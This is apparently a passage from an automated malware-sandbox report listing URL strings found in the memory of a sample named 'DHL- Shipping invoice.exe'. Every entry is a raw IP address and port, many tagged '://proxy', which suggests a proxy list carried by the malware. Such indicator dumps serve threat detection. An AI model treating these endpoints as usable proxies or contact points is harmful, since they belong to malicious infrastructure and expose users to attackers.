                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980227000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.197.102:58740://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:36129
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:36129://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:39824
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:39824://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:51045
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:51045://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:53340
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:53340://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:54917
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:54917://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:55029
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:55029://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:55742
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.225.223:55742://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:31042
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:31042://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9815BE000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:37976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:37976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:45540
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:45540://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:48414
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:48414://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51126
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51126://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51280
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51280://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51923
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:51923://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:52597
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:52597://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:54047
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:54047://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:55029
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:55029://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:55392
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:55392://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:56796
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:56796://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:60313
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.227.68:60313://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.90.49:46430
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.214.90.49:46430://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:41697
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:41697://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:48117
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.215.219.157:48117://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.216.204.146:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.216.204.146:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.116.54
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.116.54://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.116.54:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.89.84
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.89.84://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.89.84:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.91.11
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.91.11://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.91.11:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.164
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.164://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.164:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.166
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.166://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.223.94.166:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.147.48:37704
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.147.48:37704://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.185
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.185:56536
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.208.185:56536://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.22.184:43494
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.75.37
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.75.37://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.75.37:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.78.74:61792
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.78.74:61792://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.240.79.122:61792://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.207.217:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:33082
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:33082://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:50528
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:50528://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:57001
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:57001://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.45.22:63501://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:33268
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:33268://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:41442://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:46097
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:46097://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:50062
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:50062://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:56241
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:56241://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:64353
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.40:64353://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:46849
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:46849://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:58330
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.54:58330://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:34236
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:34236://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:53783
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.69:53783://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:50062
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9809E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.46.6:50062://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:40170
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:40170://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:49858
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:49858://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BDA000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:55693
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:55693://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:57364
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.50.179:57364://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980BC5000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:47856
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:47856://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98333F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:55693
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:55693://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:62192
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.53.72:62192://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:49478
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:49478://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:62874
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.70.64:62874://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:36936
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:36936://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:39107
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:39107://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:50207
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:50207://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:52048
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.241.79.22:52048://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980196000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.253.68.97:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981605000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.253.68.97:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.254.38.202:24000
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://162.254.38.202:24000://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.129.251
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.129.251:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.129.251:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.131.178:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.131.178:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.149.133
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.149.133:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.149.133:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.153.194:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.153.194:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.158.70:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.158.70:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.165.36:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.166.35:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.166.35:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98344F000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171.22:16379
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171.22:16379://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.94.175:19144
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.94.175:19144://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.47.210.74:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.47.210.74:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980164000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.77.240.27:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:52395
